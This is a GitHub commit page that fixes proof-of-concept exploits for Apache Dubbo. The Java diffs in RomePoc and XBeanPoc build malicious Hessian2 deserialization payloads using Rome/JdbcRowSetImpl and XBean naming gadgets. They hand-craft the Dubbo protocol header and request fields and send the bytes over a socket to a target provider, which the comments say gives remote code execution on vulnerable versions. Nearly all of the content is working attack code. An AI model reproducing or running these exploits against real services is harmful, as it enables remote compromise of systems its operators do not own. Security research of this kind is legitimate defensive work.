Skip to content

Commit 4632e4b

Browse files
author
threedr3am
committed
fix:xbean poc
1 parent 0f4123a commit 4632e4b

File tree

3 files changed

+27
-12
lines changed

3 files changed

+27
-12
lines changed

dubbo/pom.xml

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -10,6 +10,7 @@
1010
<modelVersion>4.0.0</modelVersion>
1111

1212
<artifactId>dubbo</artifactId>
13+
<version>1.0-SNAPSHOT</version>
1314
<packaging>pom</packaging>
1415

1516
<properties>

dubbo/src/main/java/com/threedr3am/bug/dubbo/RomePoc.java

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,10 +1,12 @@
11
package com.threedr3am.bug.dubbo;
22

3+
import com.caucho.hessian.io.Hessian2Output;
34
import com.rometools.rome.feed.impl.EqualsBean;
45
import com.rometools.rome.feed.impl.ToStringBean;
56
import com.sun.rowset.JdbcRowSetImpl;
67
import com.threedr3am.bug.common.server.LdapServer;
78
import com.threedr3am.bug.common.utils.Reflections;
9+
import com.threedr3am.bug.dubbo.support.NoWriteReplaceSerializerFactory;
810
import java.io.ByteArrayOutputStream;
911
import java.io.OutputStream;
1012
import java.lang.reflect.Array;
@@ -14,7 +16,6 @@
1416
import java.util.Random;
1517
import org.apache.dubbo.common.io.Bytes;
1618
import org.apache.dubbo.common.serialize.Cleanable;
17-
import org.apache.dubbo.common.serialize.hessian2.Hessian2ObjectOutput;
1819

1920
/**
2021
* dubbo 默认配置,即hessian2反序列化,都可RCE(dubbo版本<=2.7.5)
@@ -80,7 +81,10 @@ public static void main(String[] args) throws Exception {
8081
Bytes.long2bytes(new Random().nextInt(100000000), header, 4);
8182

8283
ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream();
83-
Hessian2ObjectOutput out = new Hessian2ObjectOutput(hessian2ByteArrayOutputStream);
84+
Hessian2Output out = new Hessian2Output(hessian2ByteArrayOutputStream);
85+
NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
86+
sf.setAllowNonSerializable(true);
87+
out.setSerializerFactory(sf);
8488

8589
out.writeObject(s);
8690

dubbo/src/main/java/com/threedr3am/bug/dubbo/XBeanPoc.java

Lines changed: 20 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -1,24 +1,26 @@
11
package com.threedr3am.bug.dubbo;
22

3+
import com.caucho.hessian.io.Hessian2Output;
34
import com.threedr3am.bug.common.server.HTTPServer;
45
import com.threedr3am.bug.common.utils.Reflections;
6+
import com.threedr3am.bug.dubbo.support.NoWriteReplaceSerializerFactory;
57
import com.threedr3am.bug.dubbo.utils.ToStringUtil;
68
import java.io.ByteArrayOutputStream;
79
import java.io.OutputStream;
810
import java.net.Socket;
11+
import java.util.HashMap;
912
import java.util.Random;
1013
import javax.naming.Context;
1114
import javax.naming.Reference;
1215
import org.apache.dubbo.common.io.Bytes;
1316
import org.apache.dubbo.common.serialize.Cleanable;
14-
import org.apache.dubbo.common.serialize.hessian2.Hessian2ObjectOutput;
1517
import org.apache.xbean.naming.context.ContextUtil.ReadOnlyBinding;
1618
import org.apache.xbean.naming.context.WritableContext;
1719

1820
/**
1921
* dubbo 默认配置,即hessian2反序列化,都可RCE
2022
*
21-
* Spring环境可打,暂时测试Spring-boot打不了
23+
* 需要dubbo环境版本<=2.6.3
2224
*
2325
* <dependency>
2426
* <groupId>org.apache.xbean</groupId>
@@ -48,20 +50,28 @@ public static void main(String[] args) throws Exception {
4850
// set magic number.
4951
Bytes.short2bytes((short) 0xdabb, header);
5052
// set request and serialization flag.
51-
header[2] = (byte) ((byte) 0x80 | 0x20 | 2);
53+
header[2] = (byte) ((byte) 0x80 | 2);
5254

5355
// set request id.
5456
Bytes.long2bytes(new Random().nextInt(100000000), header, 4);
5557

5658
ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream();
57-
Hessian2ObjectOutput out = new Hessian2ObjectOutput(hessian2ByteArrayOutputStream);
59+
Hessian2Output out = new Hessian2Output(hessian2ByteArrayOutputStream);
60+
NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
61+
sf.setAllowNonSerializable(true);
62+
out.setSerializerFactory(sf);
5863

64+
//todo 经测试,以下4个随意填
65+
//注册中心获取到的service全限定名、版本号、方法名
66+
out.writeString("2.0.2");
67+
out.writeString("com.threedr3am.learn.server.boot.DemoXXXXXXXXService");
68+
out.writeString("1.0");
69+
out.writeString("hello");
70+
//todo 方法描述不需要修改,因为此处需要指定map的payload去触发
71+
out.writeString("Ljava/util/Map;");
5972
out.writeObject(s);
60-
61-
out.flushBuffer();
62-
if (out instanceof Cleanable) {
63-
((Cleanable) out).cleanup();
64-
}
73+
out.writeObject(new HashMap());
74+
out.close();
6575

6676
Bytes.int2bytes(hessian2ByteArrayOutputStream.size(), header, 12);
6777
byteArrayOutputStream.write(header);
@@ -70,7 +80,7 @@ public static void main(String[] args) throws Exception {
7080
byte[] bytes = byteArrayOutputStream.toByteArray();
7181

7282
//todo 此处填写被攻击的dubbo服务提供者地址和端口
73-
Socket socket = new Socket("127.0.0.1", 20880);
83+
Socket socket = new Socket("127.0.0.1", 20881);
7484
OutputStream outputStream = socket.getOutputStream();
7585
outputStream.write(bytes);
7686
outputStream.flush();

0 commit comments

Comments
 (0)